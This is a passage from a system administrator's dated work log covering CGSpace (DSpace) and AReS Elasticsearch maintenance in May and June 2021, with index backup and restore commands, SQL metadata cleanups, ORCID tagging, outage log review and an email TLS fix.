+yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
+$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
+...
+    "openrxv-items-temp": {
+        "aliases": {}
+    },
+    "openrxv-items-final": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+
    +
  • I think they look OK (openrxv-items is an alias of openrxv-items-final), but I took a backup just in case:
  • +
+
$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
+$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
+
    +
  • Then I started an indexing in the AReS Explorer admin dashboard
  • +
  • The indexing finished, but it looks like the aliases are messed up again:
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
+yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
+

2021-05-05

+
    +
  • Peter noticed that we no longer display cg.link.reference on the item view +
      +
    • It seems that this got dropped accidentally when we migrated to dcterms.relation in CG Core v2
    • +
    • I fixed it in the 6_x-prod branch and told him it will be live soon
    • +
    +
  • +
+

2021-05-09

+
    +
  • I set up a clean DSpace 6.4 instance locally to test some things against, for example to be able to rule out whether some issues are due to Atmire modules or are fixed in the as-of-yet-unreleased DSpace 6.4 +
      +
    • I had to delete all the Atmire schemas, then it worked fine on Tomcat 8.5 with Mirage (I didn’t want to bother with npm and ruby for Mirage 2)
    • +
    • Then I tried to see if I could reproduce the mapping issue that Marianne raised last month +
        +
      • I tried unmapping and remapping to the CGIAR Gender grants collection and the collection appears in the item view’s list of mapped collections, but not on the collection browse itself
      • +
      • Then I tried mapping to a new collection and it was the same as above
      • +
      • So this issue is really just a DSpace bug, and nothing to do with Atmire and not fixed in the unreleased DSpace 6.4
      • +
      • I will try one more time after updating the Discovery index (I’m also curious how fast it is on vanilla DSpace 6.4, though I think I tried that when I did the flame graphs in 2019 and it was miserable)
      • +
      +
    • +
    +
  • +
+
$ time ~/dspace64/bin/dspace index-discovery -b
+~/dspace64/bin/dspace index-discovery -b  4053.24s user 53.17s system 38% cpu 2:58:53.83 total
+
    +
  • Nope! Still slow, and still no mapped item… +
      +
    • I even tried unmapping it from all collections, and adding it to a single new owning collection…
    • +
    +
  • +
  • Ah hah! Actually, I was inspecting the item’s authorization policies when I noticed that someone had made the item private! +
      +
    • After making it public again I was able to see it in the target collection
    • +
    +
  • +
  • The indexes on AReS Explorer are messed up after last week’s harvesting:
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
+yellow open openrxv-items-final      d0tbMM_SRWimirxr_gm9YA 1 1    937      0   2.2mb   2.2mb
+
+$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
+...
+    "openrxv-items-final": {
+        "aliases": {}
+    },
+    "openrxv-items-temp": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    }
+
    +
  • openrxv-items should be an alias of openrxv-items-final
  • +
  • I made a backup of the temp index and then started indexing on the AReS Explorer admin dashboard:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+

2021-05-10

+
    +
  • Amazing, the harvesting on AReS finished but it messed up all the indexes and now there are no items in any index!
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp        8thRX0WVRUeAzmd2hkG6TA 1 1      0     0    283b    283b
+yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
+yellow open openrxv-items-final       BtvV9kwVQ3yBYCZvJS1QyQ 1 1      0     0    283b    283b
+
    +
  • I fixed the indexes manually by re-creating them and cloning from the backup:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+$ curl -X PUT "localhost:9200/openrxv-items-temp-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
+$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp-backup'
+
    +
  • Also I ran all updates on the server, updated all Docker images, and then rebooted the server (linode20):
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+
    +
  • I backed up the AReS Elasticsearch data using elasticdump, then started a new harvest:
  • +
+
$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
+$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
+
    +
  • Discuss CGSpace statistics with the CIP team +
      +
    • They were wondering why their numbers for 2020 were so low
    • +
    • I checked their community using the DSpace Statistics API and found very accurate numbers for 2020 and 2019 for them
    • +
    • I think they had been using AReS, which actually doesn’t even give stats for a time period…
    • +
    +
  • +
+

2021-05-11

+
    +
  • The AReS harvesting from yesterday finished, but the indexes are messed up again so I will have to fix them again before I harvest next time
  • +
  • I also spent some time looking at IWMI’s reports again +
      +
    • On AReS we don’t have a way to group by peer reviewed or item type other than doing “if type is Journal Article”
    • +
    • Also, we don’t have a way to check the IWMI Strategic Priorities because those are communities, not metadata…
    • +
    • We can get the collections an item is in from the parentCollectionList metadata, but it is saved in Elasticsearch as a string instead of a list…
    • +
    • I told them it won’t be possible to replicate their reports exactly
    • +
    +
  • +
  • I decided to look at the CLARISA controlled vocabularies again +
      +
    • They now have 6,200 institutions (was around 3,400 when I last looked in 2020-07)
    • +
    • They have updated their Swagger interface but it still requires an API key if you want to use it from curl
    • +
    • They have ISO 3166 countries and UN M.49 regions, but I notice they have some weird names like “Russian Federation (the)”, which is not in ISO 3166 as far as I can see
    • +
    • I exported a list of the institutions to look closer +
        +
      • I found twelve items with whitespace issues
      • +
      • There are some weird entries like Research Institute for Aquaculture No1 and Research Institute for Aquaculture No2
      • +
      • A few items have weird Unicode characters like U+00AD, U+200B, and U+00A0 (a quick check for these is sketched after this list)
      • +
      • I found 100+ items with multiple languages in their name, like Ministère de l’Agriculture, de la pêche et des ressources hydrauliques / Ministry of Agriculture, Hydraulic Resources and Fisheries
      • +
      • Over 600 institutions have the country in their name like Ministry of Coordination of Environmental Affairs (Mozambique)
      • +
      • For URLs they have null in some places… which is weird… why not just leave it blank?
      • +
      +
    • +
    +
  • +
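  • A quick way to find the entries with those invisible Unicode characters (a sketch, assuming GNU grep with PCRE support and the exported list in /tmp/clarisa-institutions.txt):

$ grep -nP '\x{00AD}|\x{200B}|\x{00A0}' /tmp/clarisa-institutions.txt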
  • I checked the CLARISA list against ROR’s April, 2021 release (“Version 9”, on figshare, though it is version 8 in the dump):
  • +
+
$ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
+$ csvgrep -c matched -m 'true' /tmp/clarisa-ror-matches.csv | sed '1d' | wc -l
+1770
+
    +
  • With 1770 out of 6230 matched, that’s only about 28.4%…
  • +
  • I sent an email to Hector Tobon to point out the issues in CLARISA again and ask him to chat
  • +
  • Meeting with GARDIAN developers about CG Core and how GARDIAN works
  • +
+

2021-05-13

+
    +
  • Fix a few thousand IWMI URLs that are using HTTP instead of HTTPS on CGSpace:
  • +
+
localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://www.iwmi.cgiar.org','https://www.iwmi.cgiar.org', 'g') WHERE text_value LIKE 'http://www.iwmi.cgiar.org%' AND metadata_field_id=219;
+UPDATE 1132
+localhost/dspace63= > UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://publications.iwmi.org','https://publications.iwmi.org', 'g') WHERE text_value LIKE 'http://publications.iwmi.org%' AND metadata_field_id=219;
+UPDATE 1803
+
    +
  • In the case of the latter, the HTTP links don’t even work! The web server returns HTTP 404 unless the request is HTTPS
  • +
  • IWMI also says that their subjects are a subset of AGROVOC so they no longer want to use cg.subject.iwmi for their subjects +
      +
    • They asked if I can move them to dcterms.subject
    • +
    +
  • +
  • Delete two items for Udana because he was getting the “Authorization denied for action OBSOLETE (DELETE) …” error when trying to delete them (DSpace 6 bug I found a few months ago) + +
  • +
+

2021-05-14

+
    +
  • I updated the PostgreSQL JDBC driver in the Ansible playbooks to version 42.2.20 and deployed it on DSpace Test (linode26)
  • +
+

2021-05-15

+
    +
  • I have to fix the Elasticsearch indexes on AReS after last week’s harvesting because, as always, the openrxv-items index should be an alias of openrxv-items-final instead of openrxv-items-temp:
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
+    "openrxv-items-final": {
+        "aliases": {}
+    },
+    "openrxv-items-temp": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+...
+
    +
  • I took a backup of the openrxv-items index with elasticdump so I can re-create them manually before starting a new harvest tomorrow:
  • +
+
$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
+$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
+

2021-05-16

+
    +
  • I deleted and re-created the Elasticsearch indexes on AReS:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XPUT 'http://localhost:9200/openrxv-items-final'
+$ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
+$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+
    +
  • Then I re-imported the backup that I created with elasticdump yesterday:
  • +
+
$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000 
+
    +
  • Then I started a new harvest on AReS
  • +
+

2021-05-17

+
    +
  • The AReS harvest finished and the Elasticsearch indexes seem OK so I shouldn’t have to fix them next time…
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1      0 0    283b    283b
+yellow open openrxv-items-final      TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
+$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
+    "openrxv-items-temp": {
+        "aliases": {}
+    },
+    "openrxv-items-final": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+...
+
    +
  • Abenet said she and some others can’t log into CGSpace +
      +
    • I tried to check the CGSpace LDAP account and it does seem to be not working:
    • +
    +
  • +
+
$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap@cgiarad.org" -W "(sAMAccountName=aorth)"
+Enter LDAP Password: 
+ldap_bind: Invalid credentials (49)
+        additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
+
    +
  • I sent a message to Biruk so he can check the LDAP account
  • +
  • IWMI confirmed that they do indeed want to move all their subjects to AGROVOC, so I made the changes in the XMLUI and config (#467) +
      +
    • Then I used the migrate-fields.sh script to move them (46,000 metadata entries!)
    • +
    +
  • +
  • I tested Abdullah’s latest pull request to add clickable filters to AReS and I think it works +
      +
    • I had some issues with my local AReS installation so I was only able to do limited testing…
    • +
    • I will have to wait until I have more time to test before I can merge that
    • +
    +
  • +
  • CCAFS asked me to add eight more phase II project tags to the CGSpace input form +
      +
    • I extracted the existing ones using xmllint, added the new ones, sorted them, and then replaced them in input-forms.xml:
    • +
    +
  • +
+
$ xmllint --xpath '//value-pairs[@value-pairs-name="ccafsprojectpii"]/pair/stored-value/node()' dspace/config/input-forms.xml
+
    +
  • I formatted the input file with tidy, especially because one of the new project tags has an ampersand character… grrr:
  • +
+
$ tidy -xml -utf8 -m -iq -w 0 dspace/config/input-forms.xml      
+line 3658 column 26 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
+line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU-IFAD"
+
    +
  • After testing whether this escaped value worked during submission, I created and merged a pull request to 6_x-prod (#468)
  • +
+

2021-05-18

+
    +
  • Paola from the Alliance emailed me some new ORCID identifiers to add to CGSpace
  • +
  • I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using resolve-orcids.py:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-05-18-combined.txt
+$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
+
    +
  • I sorted the names and added the XML formatting in vim, then ran it through tidy:
  • +
+
$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-identifier.xml
+
    +
  • Tag fifty-five items from the Alliance’s new authors with ORCID iDs using add-orcid-identifiers-csv.py:
  • +
+
$ cat 2021-05-18-add-orcids.csv 
+dc.contributor.author,cg.creator.identifier
+"Urioste Daza, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
+"Urioste, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
+"Villegas, Daniel",Daniel M. Villegas: 0000-0001-6801-3332
+"Villegas, Daniel M.",Daniel M. Villegas: 0000-0001-6801-3332
+"Giles, James",James Giles: 0000-0003-1899-9206
+"Simbare,  Alice",Alice Simbare: 0000-0003-2389-0969
+"Simbare, Alice",Alice Simbare: 0000-0003-2389-0969
+"Simbare, A.",Alice Simbare: 0000-0003-2389-0969
+"Dita Rodriguez, Miguel",Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
+"Templer, Noel",Noel Templer: 0000-0002-3201-9043
+"Jalonen, R.",Riina Jalonen: 0000-0003-1669-9138
+"Jalonen, Riina",Riina Jalonen: 0000-0003-1669-9138
+"Izquierdo, Paulo",Paulo Izquierdo: 0000-0002-2153-0655
+"Reyes, Byron",Byron Reyes: 0000-0003-2672-9636
+"Reyes, Byron A.",Byron Reyes: 0000-0003-2672-9636
+$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • I deployed the latest 6_x-prod branch on CGSpace, ran all system updates, and rebooted the server +
      +
    • This included the IWMI changes, so I also migrated the cg.subject.iwmi metadata to dcterms.subject and deleted the subject term
    • +
    • Then I started a full Discovery reindex
    • +
    +
  • +
+

2021-05-19

+
    +
  • I realized that I need to lower case the IWMI subjects that I just moved to AGROVOC because they were probably mostly uppercase +
      +
    • To my surprise, I found that dcterms.subject has 47,000 metadata values that are upper or mixed case!
    • +
    +
  • +
+
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
+UPDATE 47405
+
    +
  • That’s interesting because we lowercased them all a few months ago, so these must all be new… wow +
      +
    • We have 405,000 total AGROVOC terms, with 20,600 of them being unique (a quick way to count this is sketched below)
    • +
    • I will have to start another Discovery re-indexing to pick up these new changes
    • +
    +
  • +
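  • For reference, a quick way to count total versus unique values for that field (a sketch against a local database copy; 187 is dcterms.subject on our instance):

$ psql -d dspace63 -c "SELECT COUNT(text_value) AS total, COUNT(DISTINCT text_value) AS distinct_total FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187;"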
+

2021-05-20

+
    +
  • Export the top 5,000 AGROVOC terms to validate them:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
+COPY 5000
+$ csvcut -c 1 /tmp/2021-05-20-agrovoc.csv| sed 1d > /tmp/2021-05-20-agrovoc.txt
+$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
+$ csvgrep -c "number of matches" -r '^0$' /tmp/2021-05-20-agrovoc-results.csv > /tmp/2021-05-20-agrovoc-rejected.csv
+
    +
  • Meeting with Medha and Pythagoras about the FAIR Workflow tool +
      +
    • Discussed the need for such a tool, other tools being developed, etc
    • +
    • I stressed the importance of controlled vocabularies
    • +
    • No real outcome, except to keep us posted and let us know if they need help testing on DSpace
    • +
    +
  • +
  • Meeting with Hector Tobon to discuss issues with CLARISA +
      +
    • They pushed back a bit, saying they were more focused on the needs of the CG
    • +
    • They are not against the idea of aligning more closely with ROR, but they lack the manpower
    • +
    • They pointed out that their countries come directly from the ISO 3166 online browsing platform on the ISO website
    • +
    • Indeed the text value for Russia is “Russian Federation (the)” there… I find that strange
    • +
    • I filed an issue on the iso-codes GitLab repository
    • +
    +
  • +
+

2021-05-24

+
    +
  • Add ORCID identifiers for missing ILRI authors and tag 550 others based on a few authors I noticed that were missing them:
  • +
+
$ cat 2021-05-24-add-orcids.csv 
+dc.contributor.author,cg.creator.identifier
+"Patel, Ekta","Ekta Patel: 0000-0001-9400-6988"
+"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
+"Tadelle, D.","Tadelle Dessie: 0000-0002-1630-0417"
+"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
+"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
+"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
+"Steinaa, Lucilla","Lucilla Steinaa: 0000-0003-3691-3971"
+"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
+"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
+"Rao, Idupulapati M.","Idupulapati M. Rao: 0000-0002-8381-9358"
+"Cardoso Arango, Juan Andrés","Juan Andrés Cardoso Arango: 0000-0002-0252-4655"
+$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • A few days ago I took a backup of the Elasticsearch indexes on AReS using elasticdump:
  • +
+
$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
+$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
+
    +
  • The indexes look OK so I started a harvesting on AReS
  • +
+

2021-05-25

+
    +
  • The AReS harvest got messed up somehow, as I see the number of items in the indexes are the same as before the harvesting:
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items                                                
+yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
+yellow open openrxv-items-final      soEzAnp3TDClIGZbmVyEIw 1 1    953      0   2.3mb   2.3mb
+
    +
  • Update all docker images on the AReS server (linode20):
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose -f docker/docker-compose.yml down
+$ docker-compose -f docker/docker-compose.yml build
+
    +
  • Then run all system updates on the server and reboot it
  • +
  • Oh crap, I deleted everything on AReS and restored the backup and the total items are now 104317… so it was actually correct before!
  • +
  • For reference, this is how I re-created everything:
  • +
+
curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+curl -XPUT 'http://localhost:9200/openrxv-items-final'
+curl -XPUT 'http://localhost:9200/openrxv-items-temp'
+curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
+
    +
  • I will just start a new harvest… sigh
  • +
+

2021-05-26

+
    +
  • The AReS harvest last night got stuck at 3:20AM (UTC+3) at 752 pages for some reason… +
      +
    • Something seems to have happened on CGSpace this morning around then as I have an alert from UptimeRobot as well
    • +
    • I re-created everything as above (again) and restarted the harvest
    • +
    +
  • +
  • Looking in the DSpace log for this morning I see a big hole in the logs at that time (UTC+2 server time):
  • +
+
2021-05-26 02:17:52,808 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
+2021-05-26 02:17:52,853 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
+2021-05-26 03:00:05,772 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.spidersfile:null
+2021-05-26 03:00:05,773 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.server:http://localhost:8081/solr/statistics
+
    +
  • There are no logs between 02:17 and 03:00… hmmm.
  • +
  • I see a similar gap in the Solr log, though it starts at 02:15:
  • +
+
2021-05-26 02:15:07,968 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={f.location.coll.facet.sort=count&facet.field=location.comm&facet.field=location.coll&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=search.resourcetype:2&fq=NOT(discoverable:false)&rows=0&version=2&q=*:*&f.location.coll.facet.limit=-1&facet.mincount=1&facet=true&f.location.comm.facet.sort=count&wt=javabin&facet.offset=0&f.location.comm.facet.limit=-1} hits=90792 status=0 QTime=6 
+2021-05-26 02:15:09,446 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/update params={wt=javabin&version=2} status=0 QTime=1 
+2021-05-26 02:28:03,602 INFO  org.apache.solr.update.UpdateHandler @ start commit{,optimize=false,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
+2021-05-26 02:28:03,630 INFO  org.apache.solr.core.SolrCore @ SolrDeletionPolicy.onCommit: commits: num=2
+        commit{dir=NRTCachingDirectory(MMapDirectory@/home/cgspace.cgiar.org/solr/statistics/data/index lockFactory=NativeFSLockFactory@/home/cgspace.cgiar.org/solr/statistics/data/index; maxCacheMB=48.0 maxMergeSizeMB=4.0),segFN=segments_n6ns,generation=1081720}
+        commit{dir=NRTCachingDirectory(MMapDirectory@/home/cgspace.cgiar.org/solr/statistics/data/index lockFactory=NativeFSLockFactory@/home/cgspace.cgiar.org/solr/statistics/data/index; maxCacheMB=48.0 maxMergeSizeMB=4.0),segFN=segments_n6nt,generation=1081721}
+2021-05-26 02:28:03,630 INFO  org.apache.solr.core.SolrCore @ newest commit generation = 1081721
+2021-05-26 02:28:03,632 INFO  org.apache.solr.search.SolrIndexSearcher @ Opening Searcher@34f2c871[statistics] main
+2021-05-26 02:28:03,633 INFO  org.apache.solr.core.SolrCore @ QuerySenderListener sending requests to Searcher@34f2c871[statistics] main{StandardDirectoryReader(segments_n5xy:4540675:nrt _1befl(4.10.4):C42054400/925069:delGen=8891 _1bksq(4.10.4):C685090/92211:delGen=1227 _1bx0c(4.10.4):C1069897/49988:delGen=966 _1bxr2(4.10.4):C197387/5860:delGen=485 _1cc1x(4.10.4):C353338/40887:delGen=626 _1ck6k(4.10.4):C1009357/39041:delGen=166 _1celj(4.10.4):C268907/18097:delGen=340 _1clq9(4.10.4):C147453/25003:delGen=68 _1cn3t(4.10.4):C260311/1802:delGen=82 _1cl3c(4.10.4):C47408/2610:delGen=39 _1cnmh(4.10.4):C32851/237:delGen=41 _1cod4(4.10.4):C85915/281:delGen=35 _1coy4(4.10.4):C178367/483:delGen=27 _1cpgs(4.10.4):C25465/81:delGen=13 _1cppf(4.10.4):C101411/154:delGen=15 _1cqc4(4.10.4):C26003/39:delGen=8 _1cpvl(4.10.4):C24160/91:delGen=8 _1cq3n(4.10.4):C18167/39:delGen=4 _1cq15(4.10.4):C9983/13:delGen=2 _1cq79(4.10.4):C13077/19:delGen=4 _1cqhz(4.10.4):C21251/2:delGen=1 _1cqka(4.10.4):C3531 _1cqku(4.10.4):C2597 _1cqkk(4.10.4):C2951 _1cqjq(4.10.4):C2675 _1cql5(4.10.4):C993 _1cql6(4.10.4):C161 _1cql7(4.10.4):C106 _1cql8(4.10.4):C19 _1cql9(4.10.4):C147 _1cqla(4.10.4):C2 _1cqlb(4.10.4):C15)}
+2021-05-26 02:28:03,633 INFO  org.apache.solr.core.SolrCore @ QuerySenderListener done.
+
+
  • This seems to line up with a connectivity issue reported on the Linode status page for their Frankfurt data center around that time:

May 26, 2021
+Connectivity Issue - Frankfurt
+Resolved - We haven’t observed any additional connectivity issues in our Frankfurt data center, and will now consider this incident resolved. If you continue to experience problems, please open a Support ticket for assistance.
+May 26, 02:57 UTC 
+
    +
  • While looking in the logs I noticed an error about SMTP:
  • +
+
2021-05-26 02:00:18,015 ERROR org.dspace.eperson.SubscribeCLITool @ Failed to send subscription to eperson_id=934cb92f-2e77-4881-89e2-6f13ad4b1378
+2021-05-26 02:00:18,015 ERROR org.dspace.eperson.SubscribeCLITool @ javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
+
    +
  • And indeed the email seems to be broken:
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: fuuuuuu
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
+
+Please see the DSpace documentation for assistance.
+
    +
  • I saw a recent thread on the dspace-tech mailing list about this that makes me wonder if Microsoft changed something on Office 365 +
      +
    • I added mail.smtp.ssl.protocols=TLSv1.2 to the mail.extraproperties in dspace.cfg and the test email sent successfully (see the sketch below)
    • +
    +
  • +
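  • For reference, the relevant dspace.cfg property ends up looking something like this (only the TLSv1.2 part is the new addition; the starttls entry is an assumption about what was already there for Office 365):

# dspace.cfg (sketch; the other existing extraproperties values may differ)
mail.extraproperties = mail.smtp.starttls.enable=true, mail.smtp.ssl.protocols=TLSv1.2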
+

2021-05-30

+
    +
  • Reset the Elasticsearch indexes on AReS as above and start a fresh harvest +
      +
    • The indexing finished and the total number of items is now 104504, but I’m sure the indexes are messed up so I will just start by taking a backup and re-creating them manually before every indexing
    • +
    +
  • +

June, 2021

+ +
+

2021-06-01

+
    +
  • IWMI notified me that AReS was down with an HTTP 502 error +
      +
    • Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification
    • +
    • I don’t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the angular_nginx container isn’t running
    • +
    • I simply started it and AReS was running again:
    • +
    +
  • +
+
$ docker-compose -f docker/docker-compose.yml start angular_nginx
+
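  • Checking which containers are actually up is just (a sketch, using the same compose file):

$ docker-compose -f docker/docker-compose.yml ps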
    +
  • Margarita from CCAFS emailed me to say that workflow alerts haven’t been working lately +
      +
    • I guess this is related to the SMTP issues last week
    • +
    • I had fixed the config, but didn’t restart Tomcat so DSpace didn’t load the new variables
    • +
    • I ran all system updates on CGSpace (linode18) and DSpace Test (linode26) and rebooted the servers
    • +
    +
  • +
+

2021-06-03

+
    +
  • Meeting with AMCOW and IWMI to discuss AMCOW getting IWMI’s content into the new AMCOW Knowledge Hub +
      +
    • At first we spent some time talking about DSpace communities/collections and the REST API, but then they said they actually prefer to send queries to sites on the fly and cache them in Redis for some time
    • +
    • That’s when I thought they could perhaps use the OpenSearch endpoint, but I can’t remember if it’s possible to limit by community, or only collection…
    • +
    • Looking now, I see there is a “scope” parameter that can be used for community or collection, for example:
    • +
    +
  • +
+
https://cgspace.cgiar.org/open-search/discover?query=subject:water%20scarcity&scope=10568/16814&order=DESC&rpp=100&sort_by=2&start=1
+
    +
  • That will sort by date issued (see: webui.itemlist.sort-option.2 in dspace.cfg), give 100 results per page, and start on item 1
  • +
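  • A quick way to try such a query from the command line (a sketch; totalResults is part of the OpenSearch response, and xmllint just extracts it):

$ curl -s 'https://cgspace.cgiar.org/open-search/discover?query=subject:water%20scarcity&scope=10568/16814&order=DESC&rpp=100&sort_by=2&start=1' | xmllint --xpath '//*[local-name()="totalResults"]/text()' -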
  • Another alternative would be to use the IWMI CSV that we are already exporting every week
  • +
  • Fill out the CGIAR-AGROVOC Task Group: Survey on the current CGIAR use of AGROVOC survey on behalf of CGSpace
  • +
+

2021-06-06

+
    +
  • The Elasticsearch indexes are messed up so I dumped and re-created them correctly:
  • +
+
curl -XDELETE 'http://localhost:9200/openrxv-items-final'
